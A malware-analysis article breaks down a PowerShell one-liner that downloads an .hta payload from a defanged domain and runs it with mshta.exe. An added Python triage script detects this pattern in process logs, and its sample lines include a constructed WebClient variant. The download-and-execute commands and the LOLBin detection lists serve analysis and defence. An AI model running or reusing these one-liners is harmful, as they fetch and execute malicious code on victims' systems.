Analysis of Malicious PowerShell (Part 4)
In this article, we will briefly analyze a PowerShell one-liner that downloads an .hta (HTML Application) file and executes it with mshta.exe.
Malware Sample : https://bazaar.abuse.ch/sample/d8f771c6ae73553fbbbf3d1bd0c19facaf69db4bc9663928789a970ca3e39f8b/.
Malicious Code:
powershell -Command "iwr hxxp://booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; Start-Process mshta.exe -FilePath "$env:TEMP\x.hta""
Malicious Code Analysis:
1- powershell -Command : The malware author launches PowerShell and passes the quoted string as the command to run, so the entire download-and-execute chain is carried in the command line of a single process-creation event.
2- iwr hxxp://booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta" : iwr is the built-in alias for Invoke-WebRequest. It requests the site root of booknsvrf[.]com and, because of -OutFile, writes the response body to disk instead of returning it. $env:TEMP expands to the current user's temp directory, so the payload is dropped as %TEMP%\x.hta. Note that the URL does not end in .hta: the file name and extension are chosen by the script, not by the server.
3- Start-Process mshta.exe -FilePath "$env:TEMP\x.hta" : mshta.exe is the Microsoft HTML Application host, a signed Windows binary that runs the script (VBScript or JScript) inside an .hta file with the full rights of the current user and without a browser sandbox. Here it is used to execute the file just downloaded from hxxp://booknsvrf[.]com/. One caveat on the syntax: Start-Process binds its first positional argument to -FilePath, and because -FilePath is also given by name, the named value (the .hta path) wins and "mshta.exe" falls through to -ArgumentList; since Start-Process hands the file to the shell, the .hta is still opened by its registered handler, mshta.exe. For detection, the useful signal is mshta.exe starting with a %TEMP% path on its command line, typically with powershell.exe as its parent, shortly after a powershell process whose command line contains iwr or Invoke-WebRequest together with -OutFile.
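As an added example (not part of the original post), the following Python script turns the three steps above into a triage check that can be run over process-creation command lines (Sysmon Event ID 1, Security 4688). It refangs pasted IOCs, extracts the download cmdlet, the remote URL, the -OutFile path and any LOLBin in the chain, and labels the line. The command lines it runs on are constructed for this example (the first is the one-liner analysed above, the second a WebClient variant made up for contrast); the domain is the one from the sample, kept defanged.

```python
"""Triage helper for PowerShell download-and-execute one-liners.

Added example, not code from the original post. It reads process command
lines as they appear in Sysmon Event ID 1 / Security 4688 records and pulls
out the indicators described above: the download cmdlet, the remote URL,
the dropped file and any LOLBin used to run it. The sample lines below are
constructed for this example; the domain is kept defanged as in the post.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Cmdlets and aliases PowerShell offers for fetching a remote file.
DOWNLOAD_TOKENS = {
    "iwr": "Invoke-WebRequest",
    "invoke-webrequest": "Invoke-WebRequest",
    "curl": "Invoke-WebRequest",   # alias in Windows PowerShell 5.1
    "wget": "Invoke-WebRequest",   # alias in Windows PowerShell 5.1
    "irm": "Invoke-RestMethod",
    "invoke-restmethod": "Invoke-RestMethod",
    "downloadfile": "WebClient.DownloadFile",
    "downloadstring": "WebClient.DownloadString",
}

# Signed Windows binaries commonly abused to execute a dropped payload.
LOLBINS = ("mshta", "rundll32", "regsvr32", "wscript", "cscript",
           "certutil", "msiexec")

URL_RE = re.compile(r"https?://[^\s'\";)]+", re.IGNORECASE)
OUTFILE_RE = re.compile(r'-OutFile\s+"?([^\s";]+)', re.IGNORECASE)
TEMP_RE = re.compile(r"\$env:TEMP|%TEMP%|\\AppData\\Local\\Temp", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo common defanging so the URL regex works on pasted IOCs."""
    text = re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)
    text = text.replace("[http]", "http").replace("http[://]", "http://")
    return text.replace("[.]", ".").replace("[:]", ":")


def _has_token(token: str, text: str) -> bool:
    """Whole-word match so 'iwr' does not fire on an unrelated identifier."""
    return re.search(rf"(?<![\w-]){re.escape(token)}(?![\w-])", text) is not None


@dataclass
class Finding:
    download_cmdlet: str | None = None
    urls: list[str] = field(default_factory=list)
    out_file: str | None = None
    drops_to_temp: bool = False
    lolbins: list[str] = field(default_factory=list)


def triage(cmdline: str) -> Finding:
    """Extract download/execute indicators from one process command line."""
    f = Finding()
    text = refang(cmdline)
    low = text.lower()
    if "powershell" not in low and "pwsh" not in low:
        return f                      # only PowerShell launches are in scope
    for token, cmdlet in DOWNLOAD_TOKENS.items():
        if _has_token(token, low):
            f.download_cmdlet = cmdlet
            break
    f.urls = URL_RE.findall(text)
    m = OUTFILE_RE.search(text)
    f.out_file = m.group(1) if m else None
    f.drops_to_temp = TEMP_RE.search(text) is not None
    # LOLBin names with or without the .exe suffix, matched as whole words.
    f.lolbins = [b for b in LOLBINS
                 if re.search(rf"(?<![\w-]){b}(?:\.exe)?(?![\w-])", low)]
    return f


def verdict(f: Finding) -> str:
    """Collapse the findings into a label a detection rule can key on."""
    if f.download_cmdlet and f.lolbins:
        return "download-and-execute"
    if f.download_cmdlet or f.urls:
        return "download"
    return "no-indicators"


# Constructed sample command lines (CommandLine field of Sysmon Event ID 1).
SAMPLES = [
    # the one-liner analysed above, domain defanged
    r'powershell -Command "iwr hxxp://booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; '
    r'Start-Process mshta.exe -FilePath "$env:TEMP\x.hta""',
    # constructed WebClient variant: drops outside %TEMP%, runs mshta directly
    r'''powershell -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('''
    r'''\'hxxp://booknsvrf[.]com/p.hta','C:\Users\Public\p.hta'); mshta C:\Users\Public\p.hta"''',
    # ordinary administration, should produce no indicators
    r'powershell -Command "Get-Service | Where-Object Status -eq Running"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        f = triage(line)
        print(f"{verdict(f):22} url={f.urls} out={f.out_file} "
              f"temp={f.drops_to_temp} lolbin={f.lolbins}")
```

The token table is deliberately small; extend DOWNLOAD_TOKENS and LOLBINS with whatever your environment sees (for example BitsTransfer or certutil -urlcache) rather than loosening the regexes, so the "download-and-execute" label keeps its precision.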